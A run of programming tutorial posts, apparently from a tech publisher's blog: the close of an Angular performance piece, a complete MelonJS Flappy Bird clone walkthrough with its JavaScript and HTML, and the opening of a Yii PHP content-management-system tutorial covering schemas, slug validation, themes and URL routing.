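// digest, and stop the timer once the next frame has been painted.
console.time('refresh');
var scope = angular.element(document.querySelector('[data-ng-controller]')).scope();
scope.$apply(function() {
    scope.numGen();
});
requestAnimationFrame(function() {
    console.timeEnd('refresh'); // logs elapsed milliseconds
});
```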
Conclusion

So, should you go rewrite all those Angular modules as React components? Probably not. It really comes down to the application you are developing and how dependent you are on OSS. It's definitely possible that a handful of complex modules could put your application in the realm of "feeling a tad sluggish", but it should be remembered that perceived performance is all that matters to the user. Altering the manner in which content is loaded could end up being a better investment of time. Users will feel performance increases sooner on mobile websites, however, so that is certainly something to keep in mind. The nrg module and demo code can be found over on my GitHub. Visit our JavaScript page for more JavaScript content and tutorials!

About the author

A guest post by Patrick Marabeas, a freelance frontend developer who loves learning and working with cutting edge web technologies. He spends much of his free time developing Angular modules, such as ng-FitText, ng-Slider, ng-YouTubeAPI, and ng-ScrollSpy. You can follow him on Twitter: @patrickmarabeas.


How to Create a Flappy Bird Clone with MelonJS

Ellison Leao
26 Sep 2014
18 min read
Web game frameworks such as MelonJS are becoming more popular every day. In this post I will show you how easy it is to create a Flappy Bird clone game using the MelonJS bag of tricks. I will assume that you have some experience with JavaScript and that you have visited the melonJS official page. All of the code shown in this post is available on this GitHub repository.

Step 1 - Organization

A MelonJS game can be divided into three basic objects:

- Scene objects: Define all of the game scenes (Play, Menus, Game Over, High Score, and so on)
- Game entities: Add all of the stuff that interacts in the game (Players, enemies, collectables, and so on)
- HUD entities: All of the HUD objects to be inserted on the scenes (Life, Score, Pause buttons, and so on)

For our Flappy Bird game, first create a directory, flappybirdgame, on your machine. Then create the following structure:

```
flappybirdgame
|
|--js
|--|--entities
|--|--screens
|--|--game.js
|--|--resources.js
|--data
|--|--img
|--|--bgm
|--|--sfx
|--lib
|--index.html
```

Just a quick explanation of the folders:

- js contains all of the game source. The entities folder will handle the HUD and the game entities. In the screens folder, we will create all of the scene files.
- game.js is the main game file. It initializes all of the game resources (which are created in the resources.js file), the input, and the loading of the first scene.
- The data folder is where all of the assets, sounds, and game themes are inserted. I divided the folders into img for images (backgrounds, player atlas, menus, and so on), bgm for background music files (we need to provide a .ogg and .mp3 file for each sound if we want full compatibility with all browsers) and sfx for sound effects.
- In the lib folder we will add the current 1.0.2 version of MelonJS.
- Lastly, an index.html file is used to build the canvas.

Step 2 - Implementation

First we will build the game.js file:

```javascript
var game = {
    data: {
        score: 0,
        steps: 0,
        start: false,
        newHiScore: false,
        muted: false
    },
    "onload": function() {
        if (!me.video.init("screen", 900, 600, true, 'auto')) {
            alert("Your browser does not support HTML5 canvas.");
            return;
        }
        me.audio.init("mp3,ogg");
        me.loader.onload = this.loaded.bind(this);
        me.loader.preload(game.resources);
        me.state.change(me.state.LOADING);
    },
    "loaded": function() {
        me.state.set(me.state.MENU, new game.TitleScreen());
        me.state.set(me.state.PLAY, new game.PlayScreen());
        me.state.set(me.state.GAME_OVER, new game.GameOverScreen());

        me.input.bindKey(me.input.KEY.SPACE, "fly", true);
        me.input.bindKey(me.input.KEY.M, "mute", true);
        me.input.bindPointer(me.input.KEY.SPACE);

        me.pool.register("clumsy", BirdEntity);
        me.pool.register("pipe", PipeEntity, true);
        me.pool.register("hit", HitEntity, true);

        // in melonJS 1.0.0, viewport size is set to Infinity by default
        me.game.viewport.setBounds(0, 0, 900, 600);
        me.state.change(me.state.MENU);
    }
};
```

The game.js is divided into:

- data object: This global object will handle all of the global variables that will be used in the game. For our game we will use score to record the player score, and steps to record how far the bird goes. The other variables are flags that we are using to control some game states.
- onload method: This method preloads the resources and initializes the canvas screen and then calls the loaded method when it's done.
- loaded method: This method first creates and puts into the state stack the screens that we will use in the game.
We will see the implementation for these screens later on. The loaded method also binds all of the input keys used to handle the game: for our game we will be using the space and left mouse keys to control the bird and the M key to mute sound. It also adds the game entities BirdEntity, PipeEntity and HitEntity to the game pool. I will explain the entities later.

Then you need to create the resources.js file:

```javascript
game.resources = [
    {name: "bg", type: "image", src: "data/img/bg.png"},
    {name: "clumsy", type: "image", src: "data/img/clumsy.png"},
    {name: "pipe", type: "image", src: "data/img/pipe.png"},
    {name: "logo", type: "image", src: "data/img/logo.png"},
    {name: "ground", type: "image", src: "data/img/ground.png"},
    {name: "gameover", type: "image", src: "data/img/gameover.png"},
    {name: "gameoverbg", type: "image", src: "data/img/gameoverbg.png"},
    {name: "hit", type: "image", src: "data/img/hit.png"},
    {name: "getready", type: "image", src: "data/img/getready.png"},
    {name: "new", type: "image", src: "data/img/new.png"},
    {name: "share", type: "image", src: "data/img/share.png"},
    {name: "tweet", type: "image", src: "data/img/tweet.png"},
    {name: "leader", type: "image", src: "data/img/leader.png"},
    {name: "theme", type: "audio", src: "data/bgm/"},
    {name: "hit", type: "audio", src: "data/sfx/"},
    {name: "lose", type: "audio", src: "data/sfx/"},
    {name: "wing", type: "audio", src: "data/sfx/"},
];
```

Now let's create the game entities. First the HUD elements: create a HUD.js file in the entities folder. In this file you will create:

- A score entity
- A background layer entity
- The share button entities (Facebook, Twitter, and so on)

```javascript
game.HUD = game.HUD || {};

game.HUD.Container = me.ObjectContainer.extend({
    init: function() {
        // call the constructor
        this.parent();
        // persistent across level change
        this.isPersistent = true;
        // non collidable
        this.collidable = false;
        // make sure our object is always drawn first
        this.z = Infinity;
        // give a name
        this.name = "HUD";
        // add our child score object at the top left corner
        this.addChild(new game.HUD.ScoreItem(5, 5));
    }
});

game.HUD.ScoreItem = me.Renderable.extend({
    init: function(x, y) {
        // call the parent constructor
        // (size does not matter here)
        this.parent(new me.Vector2d(x, y), 10, 10);
        // local copy of the global score
        this.stepsFont = new me.Font('gamefont', 80, '#000', 'center');
        // make sure we use screen coordinates
        this.floating = true;
    },
    update: function() {
        return true;
    },
    draw: function(context) {
        if (game.data.start && me.state.isCurrent(me.state.PLAY))
            this.stepsFont.draw(context, game.data.steps, me.video.getWidth()/2, 10);
    }
});

var BackgroundLayer = me.ImageLayer.extend({
    init: function(image, z, speed) {
        name = image;
        width = 900;
        height = 600;
        ratio = 1;
        // call parent constructor
        this.parent(name, width, height, image, z, ratio);
    },
    update: function() {
        if (me.input.isKeyPressed('mute')) {
            game.data.muted = !game.data.muted;
            if (game.data.muted) {
                me.audio.disable();
            } else {
                me.audio.enable();
            }
        }
        return true;
    }
});

var Share = me.GUI_Object.extend({
    init: function(x, y) {
        var settings = {};
        settings.image = "share";
        settings.spritewidth = 150;
        settings.spriteheight = 75;
        this.parent(x, y, settings);
    },
    onClick: function(event) {
        var shareText = 'Just made ' + game.data.steps + ' steps on Clumsy Bird! Can you beat me? Try online here!';
        var url = 'http://ellisonleao.github.io/clumsy-bird/';
        FB.ui({
            method: 'feed',
            name: 'My Clumsy Bird Score!',
            caption: "Share to your friends",
            description: (shareText),
            link: url,
            picture: 'http://ellisonleao.github.io/clumsy-bird/data/img/clumsy.png'
        });
        return false;
    }
});
```
```javascript
var Tweet = me.GUI_Object.extend({
    init: function(x, y) {
        var settings = {};
        settings.image = "tweet";
        settings.spritewidth = 152;
        settings.spriteheight = 75;
        this.parent(x, y, settings);
    },
    onClick: function(event) {
        var shareText = 'Just made ' + game.data.steps + ' steps on Clumsy Bird! Can you beat me? Try online here!';
        var url = 'http://ellisonleao.github.io/clumsy-bird/';
        var hashtags = 'clumsybird,melonjs';
        window.open('https://twitter.com/intent/tweet?text=' + shareText +
            '&hashtags=' + hashtags + '&count=' + url + '&url=' + url,
            'Tweet!', 'height=300,width=400');
        return false;
    }
});
```

You should notice that there are different me classes for different types of entities. The ScoreItem is a Renderable object that is created under an ObjectContainer and it will render the game steps on the play screen that we will create later. The Share and Tweet buttons are created with the GUI_Object class. This class implements the onClick event that handles click events used to create the share events. The BackgroundLayer is a particular object created using the ImageLayer class. This class controls some generic image layers that can be used in the game. In our particular case we are just using a single fixed image, with a fixed ratio and no scrolling.

Now to the game entities. For this game we will need:

- BirdEntity: The bird and its behavior
- PipeEntity: The pipe object
- HitEntity: An invisible entity just to get the steps counting
- PipeGenerator: Will handle the PipeEntity creation
- Ground: An entity for the ground
- TheGround: The animated ground container

Add an entities.js file into the entities folder:

```javascript
var BirdEntity = me.ObjectEntity.extend({
    init: function(x, y) {
        var settings = {};
        settings.image = me.loader.getImage('clumsy');
        settings.width = 85;
        settings.height = 60;
        settings.spritewidth = 85;
        settings.spriteheight = 60;
        this.parent(x, y, settings);
        this.alwaysUpdate = true;
        this.gravity = 0.2;
        this.gravityForce = 0.01;
        this.maxAngleRotation = Number.prototype.degToRad(30);
        this.maxAngleRotationDown = Number.prototype.degToRad(90);
        this.renderable.addAnimation("flying", [0, 1, 2]);
        this.renderable.addAnimation("idle", [0]);
        this.renderable.setCurrentAnimation("flying");
        this.animationController = 0;
        // manually add a rectangular collision shape
        this.addShape(new me.Rect(new me.Vector2d(5, 5), 70, 50));
        // a tween object for the flying physic effect
        this.flyTween = new me.Tween(this.pos);
        this.flyTween.easing(me.Tween.Easing.Exponential.InOut);
    },
    update: function(dt) {
        // mechanics
        if (game.data.start) {
            if (me.input.isKeyPressed('fly')) {
                me.audio.play('wing');
                this.gravityForce = 0.01;
                var currentPos = this.pos.y;
                // stop the previous one
                this.flyTween.stop();
                this.flyTween.to({y: currentPos - 72}, 100);
                this.flyTween.start();
                this.renderable.angle = -this.maxAngleRotation;
            } else {
                this.gravityForce += 0.2;
                this.pos.y += me.timer.tick * this.gravityForce;
                this.renderable.angle += Number.prototype.degToRad(3) * me.timer.tick;
                if (this.renderable.angle > this.maxAngleRotationDown)
                    this.renderable.angle = this.maxAngleRotationDown;
            }
        }
        var res = me.game.world.collide(this);
        if (res) {
            if (res.obj.type != 'hit') {
                me.device.vibrate(500);
                me.state.change(me.state.GAME_OVER);
                return false;
            }
            // remove the hit box
            me.game.world.removeChildNow(res.obj);
            // the dt parameter given to the update function
            // is the time in ms since the last frame — use it instead?
            game.data.steps++;
            me.audio.play('hit');
        } else {
            var hitGround = me.game.viewport.height - (96 + 60);
            var hitSky = -80; // bird height + 20px
            if (this.pos.y >= hitGround || this.pos.y <= hitSky) {
                me.state.change(me.state.GAME_OVER);
                return false;
            }
        }
        return this.parent(dt);
    },
});
```
```javascript
var PipeEntity = me.ObjectEntity.extend({
    init: function(x, y) {
        var settings = {};
        settings.image = me.loader.getImage('pipe');
        settings.width = 148;
        settings.height = 1664;
        settings.spritewidth = 148;
        settings.spriteheight = 1664;
        this.parent(x, y, settings);
        this.alwaysUpdate = true;
        this.gravity = 5;
        this.updateTime = false;
    },
    update: function(dt) {
        // mechanics
        this.pos.add(new me.Vector2d(-this.gravity * me.timer.tick, 0));
        if (this.pos.x < -148) {
            me.game.world.removeChild(this);
        }
        return true;
    },
});

var PipeGenerator = me.Renderable.extend({
    init: function() {
        this.parent(new me.Vector2d(), me.game.viewport.width, me.game.viewport.height);
        this.alwaysUpdate = true;
        this.generate = 0;
        this.pipeFrequency = 92;
        this.pipeHoleSize = 1240;
        this.posX = me.game.viewport.width;
    },
    update: function(dt) {
        if (this.generate++ % this.pipeFrequency == 0) {
            var posY = Number.prototype.random(
                me.video.getHeight() - 100,
                200
            );
            var posY2 = posY - me.video.getHeight() - this.pipeHoleSize;
            var pipe1 = new me.pool.pull("pipe", this.posX, posY);
            var pipe2 = new me.pool.pull("pipe", this.posX, posY2);
            var hitPos = posY - 100;
            var hit = new me.pool.pull("hit", this.posX, hitPos);
            pipe1.renderable.flipY();
            me.game.world.addChild(pipe1, 10);
            me.game.world.addChild(pipe2, 10);
            me.game.world.addChild(hit, 11);
        }
        return true;
    },
});

var HitEntity = me.ObjectEntity.extend({
    init: function(x, y) {
        var settings = {};
        settings.image = me.loader.getImage('hit');
        settings.width = 148;
        settings.height = 60;
        settings.spritewidth = 148;
        settings.spriteheight = 60;
        this.parent(x, y, settings);
        this.alwaysUpdate = true;
        this.gravity = 5;
        this.updateTime = false;
        this.type = 'hit';
        this.renderable.alpha = 0;
        this.ac = new me.Vector2d(-this.gravity, 0);
    },
    update: function() {
        // mechanics
        this.pos.add(this.ac);
        if (this.pos.x < -148) {
            me.game.world.removeChild(this);
        }
        return true;
    },
});

var Ground = me.ObjectEntity.extend({
    init: function(x, y) {
        var settings = {};
        settings.image = me.loader.getImage('ground');
        settings.width = 900;
        settings.height = 96;
        this.parent(x, y, settings);
        this.alwaysUpdate = true;
        this.gravity = 0;
        this.updateTime = false;
        this.accel = new me.Vector2d(-4, 0);
    },
    update: function() {
        // mechanics
        this.pos.add(this.accel);
        if (this.pos.x < -this.renderable.width) {
            this.pos.x = me.video.getWidth() - 10;
        }
        return true;
    },
});

var TheGround = Object.extend({
    init: function() {
        this.ground1 = new Ground(0, me.video.getHeight() - 96);
        this.ground2 = new Ground(me.video.getWidth(), me.video.getHeight() - 96);
        me.game.world.addChild(this.ground1, 11);
        me.game.world.addChild(this.ground2, 11);
    },
    update: function() {
        return true;
    }
})
```

Note that every game entity inherits from the me.ObjectEntity class. We need to pass the settings of the entity in the init method, telling it which image we will use from the resources along with the image measures. We also implement the update method for each entity, telling it how it will behave during game time. A minimal sketch of this pattern is shown below.
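Distilled to its core, the pattern every entity above follows looks like this (an illustrative sketch of my own, not part of the clone; the 'coin' asset is hypothetical):

```javascript
var CoinEntity = me.ObjectEntity.extend({
    init: function(x, y) {
        // describe the sprite via settings, then hand them to the parent
        var settings = {};
        settings.image = me.loader.getImage('coin'); // hypothetical asset
        settings.width = 32;
        settings.height = 32;
        this.parent(x, y, settings);
        this.alwaysUpdate = true;
    },
    update: function(dt) {
        // per-frame behavior: drift left, despawn once off-screen
        this.pos.add(new me.Vector2d(-2 * me.timer.tick, 0));
        if (this.pos.x < -32) {
            me.game.world.removeChild(this);
        }
        return true;
    },
});
```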
Now we need to create our scenes. The game is divided into:

- TitleScreen
- PlayScreen
- GameOverScreen

We will separate the scenes into js files. First create a title.js file in the screens folder:

```javascript
game.TitleScreen = me.ScreenObject.extend({
    init: function() {
        this.font = null;
    },
    onResetEvent: function() {
        me.audio.stop("theme");
        game.data.newHiScore = false;
        me.game.world.addChild(new BackgroundLayer('bg', 1));
        me.input.bindKey(me.input.KEY.ENTER, "enter", true);
        me.input.bindKey(me.input.KEY.SPACE, "enter", true);
        me.input.bindPointer(me.input.mouse.LEFT, me.input.KEY.ENTER);
        this.handler = me.event.subscribe(me.event.KEYDOWN, function(action, keyCode, edge) {
            if (action === "enter") {
                me.state.change(me.state.PLAY);
            }
        });

        // logo
        var logoImg = me.loader.getImage('logo');
        var logo = new me.SpriteObject(
            me.game.viewport.width/2 - 170,
            -logoImg.height,
            logoImg
        );
        me.game.world.addChild(logo, 10);
        var logoTween = new me.Tween(logo.pos)
            .to({y: me.game.viewport.height/2 - 100}, 1000)
            .easing(me.Tween.Easing.Exponential.InOut)
            .start();

        this.ground = new TheGround();
        me.game.world.addChild(this.ground, 11);

        me.game.world.addChild(new (me.Renderable.extend({
            // constructor
            init: function() {
                // size does not matter, it's just to avoid having a
                // zero size renderable
                this.parent(new me.Vector2d(), 100, 100);
                this.text = me.device.touch ?
                    'Tap to start' :
                    'PRESS SPACE OR CLICK LEFT MOUSE BUTTON TO START\n\t\t\t\t\t\t\t\t\t\t\tPRESS "M" TO MUTE SOUND';
                this.font = new me.Font('gamefont', 20, '#000');
            },
            update: function() {
                return true;
            },
            draw: function(context) {
                var measure = this.font.measureText(context, this.text);
                this.font.draw(context, this.text,
                    me.game.viewport.width/2 - measure.width/2,
                    me.game.viewport.height/2 + 50);
            }
        })), 12);
    },
    onDestroyEvent: function() {
        // unregister the event
        me.event.unsubscribe(this.handler);
        me.input.unbindKey(me.input.KEY.ENTER);
        me.input.unbindKey(me.input.KEY.SPACE);
        me.input.unbindPointer(me.input.mouse.LEFT);
        me.game.world.removeChild(this.ground);
    }
});
```

Then, create a play.js file in the same folder:
Then, create a play.js file in the same folder:

game.PlayScreen = me.ScreenObject.extend({
    init: function() {
        me.audio.play("theme", true);
        // lower the audio volume on the Firefox browser
        var vol = me.device.ua.contains("Firefox") ? 0.3 : 0.5;
        me.audio.setVolume(vol);
        this.parent(this);
    },

    onResetEvent: function() {
        me.audio.stop("theme");
        if (!game.data.muted){
            me.audio.play("theme", true);
        }
        me.input.bindKey(me.input.KEY.SPACE, "fly", true);
        game.data.score = 0;
        game.data.steps = 0;
        game.data.start = false;
        game.data.newHiScore = false;

        me.game.world.addChild(new BackgroundLayer('bg', 1));

        this.ground = new TheGround();
        me.game.world.addChild(this.ground, 11);

        this.HUD = new game.HUD.Container();
        me.game.world.addChild(this.HUD);

        this.bird = me.pool.pull("clumsy", 60, me.game.viewport.height/2 - 100);
        me.game.world.addChild(this.bird, 10);

        // inputs
        me.input.bindPointer(me.input.mouse.LEFT, me.input.KEY.SPACE);

        this.getReady = new me.SpriteObject(
            me.video.getWidth()/2 - 200,
            me.video.getHeight()/2 - 100,
            me.loader.getImage('getready')
        );
        me.game.world.addChild(this.getReady, 11);

        var fadeOut = new me.Tween(this.getReady).to({alpha: 0}, 2000)
            .easing(me.Tween.Easing.Linear.None)
            .onComplete(function() {
                game.data.start = true;
                me.game.world.addChild(new PipeGenerator(), 0);
            }).start();
    },

    onDestroyEvent: function() {
        me.audio.stopTrack('theme');
        // free the stored instances
        this.HUD = null;
        this.bird = null;
        me.input.unbindKey(me.input.KEY.SPACE);
        me.input.unbindPointer(me.input.mouse.LEFT);
    }
});

Finally, the gameover.js screen:

game.GameOverScreen = me.ScreenObject.extend({
    init: function() {
        this.savedData = null;
        this.handler = null;
    },

    onResetEvent: function() {
        me.audio.play("lose");

        // save section
        this.savedData = {
            score: game.data.score,
            steps: game.data.steps
        };
        me.save.add(this.savedData);

        // clay.io
        if (game.data.score > 0) {
            me.plugin.clay.leaderboard('clumsy');
        }

        if (!me.save.topSteps) me.save.add({topSteps: game.data.steps});
        if (game.data.steps > me.save.topSteps) {
            me.save.topSteps = game.data.steps;
            game.data.newHiScore = true;
        }

        me.input.bindKey(me.input.KEY.ENTER, "enter", true);
        me.input.bindKey(me.input.KEY.SPACE, "enter", false);
        me.input.bindPointer(me.input.mouse.LEFT, me.input.KEY.ENTER);

        this.handler = me.event.subscribe(me.event.KEYDOWN, function (action, keyCode, edge) {
            if (action === "enter") {
                me.state.change(me.state.MENU);
            }
        });

        var gImage = me.loader.getImage('gameover');
        me.game.world.addChild(new me.SpriteObject(
            me.video.getWidth()/2 - gImage.width/2,
            me.video.getHeight()/2 - gImage.height/2 - 100,
            gImage
        ), 12);

        var gImageBoard = me.loader.getImage('gameoverbg');
        me.game.world.addChild(new me.SpriteObject(
            me.video.getWidth()/2 - gImageBoard.width/2,
            me.video.getHeight()/2 - gImageBoard.height/2,
            gImageBoard
        ), 10);

        me.game.world.addChild(new BackgroundLayer('bg', 1));

        this.ground = new TheGround();
        me.game.world.addChild(this.ground, 11);

        // share button
        var buttonsHeight = me.video.getHeight() / 2 + 200;
        this.share = new Share(me.video.getWidth()/3 - 100, buttonsHeight);
        me.game.world.addChild(this.share, 12);

        // tweet button
        this.tweet = new Tweet(this.share.pos.x + 170, buttonsHeight);
        me.game.world.addChild(this.tweet, 12);

        // leaderboard button
        this.leader = new Leader(this.tweet.pos.x + 170, buttonsHeight);
        me.game.world.addChild(this.leader, 12);

        // add the dialog with the game information
        if (game.data.newHiScore) {
            var newRect = new me.SpriteObject(
                235,
                355,
                me.loader.getImage('new')
            );
            me.game.world.addChild(newRect, 12);
        }

        this.dialog = new (me.Renderable.extend({
            // constructor
            init: function() {
                // size does not matter, it's just to avoid having a
                // zero size renderable
                this.parent(new me.Vector2d(), 100, 100);
                this.font = new me.Font('gamefont', 40, 'black', 'left');
                this.steps = 'Steps: ' + game.data.steps.toString();
                this.topSteps = 'Highest Steps: ' + me.save.topSteps.toString();
            },

            update: function () {
                return true;
            },

            draw: function (context) {
                var stepsText = this.font.measureText(context, this.steps);

                // steps
                this.font.draw(
                    context,
                    this.steps,
                    me.game.viewport.width/2 - stepsText.width/2 - 60,
                    me.game.viewport.height/2
                );

                // top score, left-aligned with the steps line
                this.font.draw(
                    context,
                    this.topSteps,
                    me.game.viewport.width/2 - stepsText.width/2 - 60,
                    me.game.viewport.height/2 + 50
                );
            }
        }));
        me.game.world.addChild(this.dialog, 12);
    },

    onDestroyEvent: function() {
        // unregister the event
        me.event.unsubscribe(this.handler);
        me.input.unbindKey(me.input.KEY.ENTER);
        me.input.unbindKey(me.input.KEY.SPACE);
        me.input.unbindPointer(me.input.mouse.LEFT);
        me.game.world.removeChild(this.ground);
        this.font = null;
        me.audio.stop("theme");
    }
});

Here is how a ScreenObject works:

First, it calls the init constructor method for any variable initialization.
onResetEvent is called next, every time the scene is entered. In our case, onResetEvent adds our objects to the game world stack.
onDestroyEvent acts like a garbage collector: it unregisters bound events and removes elements from the game world.

Now, let's put it all together in the index.html file:

<!DOCTYPE HTML>
<html lang="en">
<head>
    <title>Clumsy Bird</title>
</head>
<body>
    <!-- the facebook init for the share button -->
    <div id="fb-root"></div>
    <script>
        window.fbAsyncInit = function() {
            FB.init({
                appId : '213642148840283',
                status : true,
                xfbml : true
            });
        };
        (function(d, s, id){
            var js, fjs = d.getElementsByTagName(s)[0];
            if (d.getElementById(id)) {return;}
            js = d.createElement(s); js.id = id;
            js.src = "//connect.facebook.net/pt_BR/all.js";
            fjs.parentNode.insertBefore(js, fjs);
        }(document, 'script', 'facebook-jssdk'));
    </script>

    <!-- Canvas placeholder -->
    <div id="screen"></div>

    <!-- melonJS Library -->
    <script type="text/javascript" src="lib/melonJS-1.0.2.js" ></script>
    <script type="text/javascript" src="js/entities/HUD.js" ></script>
    <script type="text/javascript" src="js/entities/entities.js" ></script>
    <script type="text/javascript" src="js/screens/title.js" ></script>
    <script type="text/javascript" src="js/screens/play.js" ></script>
    <script type="text/javascript" src="js/screens/gameover.js" ></script>
</body>
</html>

Step 3 - Flying!

To run our game, we will need a web server of your choice. If you have Python installed, you can simply type the following in your shell:

$ python -m SimpleHTTPServer

Then you can open your browser at http://localhost:8000. If all went well, you will see the title screen after it loads, like in the following image:

I hope you enjoyed this post!

About this author

Ellison Leão (@ellisonleao) is a passionate software engineer with more than 6 years of experience in web projects and is a contributor to the MelonJS framework and other open source projects. When he is not writing games, he loves to play drums.

Building a Content Management System

Packt
25 Sep 2014
25 min read
In this article by Charles R. Portwood II, the author of Yii Project Blueprints, we will look at how to create a feature-complete content management system and blogging platform. (For more resources related to this topic, see here.)

Describing the project

Our CMS can be broken down into several different components:

Users who will be responsible for viewing and managing the content
Content to be managed
Categories for our content to be placed into
Metadata to help us further define our content and users
Search engine optimizations

Users

The first component of our application is the users who will perform all the tasks in our application. For this application, we're going to largely reuse the user database and authentication system. In this article, we'll enhance this functionality by allowing social authentication: our CMS will let users register new accounts from the data provided by Twitter and, after they have registered, sign in to our application by signing in to Twitter.

To know whether a user is a socially authenticated user, we have to make several changes to both our database and our authentication scheme. First, we need a way to indicate whether a user is socially authenticated. Rather than hardcoding an isAuthenticatedViaTwitter column in our database, we'll create a new database table called user_metadata, a simple table that contains the user's ID, a unique key, and a value. This will allow us to store additional information about our users without having to explicitly change our user's database table every time we want to make a change:

ID INTEGER PRIMARY KEY
user_id INTEGER
key STRING
value STRING
created INTEGER
updated INTEGER

We'll also need to modify our UserIdentity class to allow socially authenticated users to sign in. To do this, we'll expand upon this class to create a RemoteUserIdentity class that will work off the OAuth codes that Twitter (or any other third-party source that works with HybridAuth) provides to us, rather than authenticating against a username and password.
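To make the key-value idea concrete, here is a hedged sketch of how such a flag could be stored. The UserMetadata Active Record shown here is hypothetical and not part of the skeleton project:

// hypothetical Active Record model for the user_metadata table
$meta = new UserMetadata();
$meta->user_id = $user->id;
$meta->key = 'isAuthenticatedViaTwitter';
$meta->value = '1';
$meta->save(); // created/updated would be filled by CTimestampBehavior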
Content

At the core of our CMS is the content that we'll manage. For this project, we'll manage simple blog posts that can have additional metadata associated with them. Each post will have a title, a body, an author, a category, a unique URI or slug, and an indication of whether it has been published or not. Our database structure for this table will look as follows:

ID INTEGER PRIMARY KEY
title STRING
body TEXT
published INTEGER
author_id INTEGER
category_id INTEGER
slug STRING
created INTEGER
updated INTEGER

Each post will also have one or many metadata columns that further describe the posts we'll be creating. We can use this table (we'll call it content_metadata) to have our system store information about each post automatically for us, or to add information to our posts ourselves, thereby eliminating the need to migrate our database every time we want to add a new attribute to our content:

ID INTEGER PRIMARY KEY
content_id INTEGER
key STRING
value STRING
created INTEGER
updated INTEGER

Categories

Each post will be associated with a category in our system. These categories will help us further refine our posts. As with our content, each category will have its own slug. Before either a post or a category is saved, we'll need to verify that the slug is not already in use. Our table structure will look as follows:

ID INTEGER PRIMARY KEY
name STRING
description TEXT
slug STRING
created INTEGER
updated INTEGER

Search engine optimizations

The last core component of our application is optimization for search engines so that our content can be indexed quickly. SEO is important because it increases our discoverability and availability both on search engines and on other marketing materials. In our application, there are a couple of things we'll do to improve our SEO:

The first SEO enhancement we'll add is a sitemap.xml file, which we can submit to popular search engines to index. Rather than crawl our content, search engines can very quickly index our sitemap.xml file, which means that our content will show up in search engines faster.

The second enhancement is the slugs that we discussed earlier. Slugs allow us to indicate what a particular post is about directly from a URL. So rather than a URL that looks like http://chapter6.example.com/content/post/id/5, we can have URLs that look like http://chapter6.example.com/my-awesome-article. These URLs allow search engines and our users to know what our content is about without even looking at the content itself, such as when a user is browsing through their bookmarks or a search engine's results.

Initializing the project

To provide us with a common starting ground, a skeleton project has been included with the project resources for this article. Included with this skeleton project are the necessary migrations, data files, controllers, and views to get us started with developing. Also included are the user authentication classes. Copy this skeleton project to your web server, configure it so that it responds to chapter6.example.com as outlined at the beginning of the article, and then perform the following steps to make sure everything is set up:

Adjust the permissions on the assets and protected/runtime folders so that they are writable by your web server.

In this article, we'll once again use the latest version of MySQL (at the time of writing, MySQL 5.6). Make sure that your MySQL server is set up and running on your server. Then, create a username, password, and database for our project to use, and update your protected/config/main.php file accordingly. For simplicity, you can use ch6_cms for each value.

Install our Composer dependencies:

composer install

Run the migrate command and install our mock data:

php protected/yiic.php migrate up --interactive=0
psql ch6_cms -f protected/data/postgres.sql

Finally, add your SendGrid credentials to your protected/config/params.php file:

'username' => '<username>',
'password' => '<password>',
'from' => '[email protected]'

If everything is loaded correctly, you should see a 404 page similar to the following:

Exploring the skeleton project

There is actually a lot going on in the background to make this work, even if it's just a 404 error. Before we start doing any development, let's take a look at a few of the classes that have been provided in our skeleton project in the protected/components folder.

Extending models from a common class

The first class that has been provided to us is an ActiveRecord extension called CMSActiveRecord that all of our models will stem from. This class allows us to reduce the amount of code that we have to write in each class.
For now, we'll simply add CTimestampBehavior and an afterFind() method that stores the old attributes, for the time the need arises to compare the changed attributes with the new attributes:

class CMSActiveRecord extends CActiveRecord
{
    public $_oldAttributes = array();

    public function behaviors()
    {
        return array(
            'CTimestampBehavior' => array(
                'class' => 'zii.behaviors.CTimestampBehavior',
                'createAttribute' => 'created',
                'updateAttribute' => 'updated',
                'setUpdateOnCreate' => true
            )
        );
    }

    public function afterFind()
    {
        if ($this !== NULL)
            $this->_oldAttributes = $this->attributes;
        return parent::afterFind();
    }
}

Creating a custom validator for slugs

Since both the Content and Category classes have slugs, we'll need to add a custom validator to each class to ensure that the slug is not already in use by either a post or a category. To do this, we have another class called CMSSlugActiveRecord that extends CMSActiveRecord with a validateSlug() method, which we'll implement as follows:

class CMSSlugActiveRecord extends CMSActiveRecord
{
    public function validateSlug($attributes, $params)
    {
        // Fetch any records that have that slug
        $content = Content::model()->findByAttributes(array('slug' => $this->slug));
        $category = Category::model()->findByAttributes(array('slug' => $this->slug));

        $class = strtolower(get_class($this));

        if ($content == NULL && $category == NULL)
            return true;
        else if (($content == NULL && $category != NULL) || ($content != NULL && $category == NULL))
        {
            $this->addError('slug', 'That slug is already in use');
            return false;
        }
        else
        {
            if ($this->id == $$class->id)
                return true;
        }

        $this->addError('slug', 'That slug is already in use');
        return false;
    }
}

This implementation simply checks the database for any item that has that slug. If nothing is found, or if the current item is the item being modified, the validator returns true. Otherwise, it adds an error to the slug attribute and returns false. Both our Content and Category models will extend from this class.

View management with themes

One of the biggest challenges of working with larger applications is changing their appearance without locking functionality into our views. One way to further separate our business logic from our presentation logic is to use themes. Using themes in Yii, we can dynamically change the presentation layer of our application simply by utilizing the Yii::app()->setTheme('themename') method. Once this method is called, Yii will look for view files in themes/themename/views rather than protected/views. Throughout the rest of the article, we'll be adding views to a custom theme called main, which is located in the themes folder.

To set this theme globally, we'll create a custom class called CMSController, which all of our controllers will extend from. For now, our theme name will be hardcoded within our application. This value could easily be retrieved from a database, though, allowing us to dynamically change themes from a cached or database value rather than changing it in our controller. Have a look at the following lines of code:

class CMSController extends CController
{
    public function beforeAction($action)
    {
        Yii::app()->setTheme('main');
        return parent::beforeAction($action);
    }
}
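As a hedged sketch of that idea (not part of the skeleton project), the hardcoded name could be swapped for a cached value with a fallback; the 'site.theme' cache key here is made up for illustration:

public function beforeAction($action)
{
    // hypothetical: read the theme name from cache (or a settings table),
    // falling back to the hardcoded default on a cache miss
    $theme = Yii::app()->cache->get('site.theme');
    Yii::app()->setTheme($theme === false ? 'main' : $theme);
    return parent::beforeAction($action);
}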
Truly dynamic routing

In our previous applications, we had long, boring URLs with lots of IDs and parameters in them. These URLs provided a terrible user experience and prevented search engines and users from knowing what the content was about at a glance, which in turn would hurt our SEO rankings on many search engines. To get around this, we're going to heavily modify our UrlManager class to allow truly dynamic routing, which means that every time we create or update a post or a category, our URL rules will be updated.

Telling Yii to use our custom UrlManager

Before we can start working on our controllers, we need to create a custom UrlManager to handle the routing of our content so that we can access it by its slug. The steps are as follows:

The first change we need to make is to update the components section of our protected/config/main.php file. This will tell Yii which class to use for the UrlManager component:

'urlManager' => array(
    'class' => 'application.components.CMSUrlManager',
